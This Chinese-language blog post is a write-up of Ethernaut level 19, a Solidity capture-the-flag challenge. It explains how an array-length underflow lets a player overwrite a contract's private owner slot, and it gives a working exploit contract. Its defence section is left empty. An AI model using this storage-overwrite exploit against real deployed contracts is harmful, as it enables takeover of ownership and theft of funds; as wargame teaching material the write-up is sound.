# 智能合约黑客攻击 Ethernaut: 19. Alien Codex By [Leek DEV](https://paragraph.com/@leekdev) · 2023-09-28 --- [Ethernaut](https://ethernaut.openzeppelin.com/) 是一个由 [OpenZeppelin](https://www.openzeppelin.com/) 基于 Solidity 编程语言开发的对抗游戏,每个关卡都有需要被 Hack 的智能合约。 教程 -- * GitHub - [攻击代码](https://github.com/6boris) * Bilibili - [视频教程](https://space.bilibili.com/3493272831920239) * YouTube - [视频教程](https://www.youtube.com/@LeekDEV) * TikTok - …. 题目 -- 将合约owner改为自己 Hack思路 ------ 合约里的 owner 是 private 的,也没有提供方法修改。但是后面有个 数组,提供了比较hack的方法,可以从这里入手 。 ![Storage Slot](https://storage.googleapis.com/papyrus_images/e62cd8a9d03afb0c695960db60457a34e994dfe7f28d29e8c4678ab1eb6f7b31.png) Storage Slot ![Storage Slot](https://storage.googleapis.com/papyrus_images/86091bdd1266410f40bd282671cdd69ca861db03678fbdff7070dc5be1299950.png) Storage Slot 攻击代码 // SPDX-License-Identifier: MIT pragma solidity ^0.8.0; interface IAlienCodex { function owner() external view returns (address); function makeContact() external; function record(bytes32 _content) external; function retract() external; function revise(uint256 i, bytes32 _content) external; } contract AlienCodexHack { IAlienCodex public exploitInst; constructor(address _target) { exploitInst = IAlienCodex(_target); exploitInst.makeContact(); exploitInst.retract(); exploitInst.revise(((2 ** 256) - 1) - uint256(keccak256(abi.encode(1))) + 1, bytes32(abi.encode(tx.origin))); } } Hack案例 ------ … 防范思路 ---- … 参考资料 ---- * [Layout of State Variables in Storage](https://docs.soliditylang.org/en/latest/internals/layout_in_storage.html) * [Ethernaut Level 19 - Alien Codex](https://blog.dixitaditya.com/ethernaut-level-19-alien-codex) * [Finding Storage Slots](https://docs.axiom.xyz/developers/sending-a-query/finding-storage-slots) --- *Originally published on [Leek DEV](https://paragraph.com/@leekdev/ethernaut-19-alien-codex)*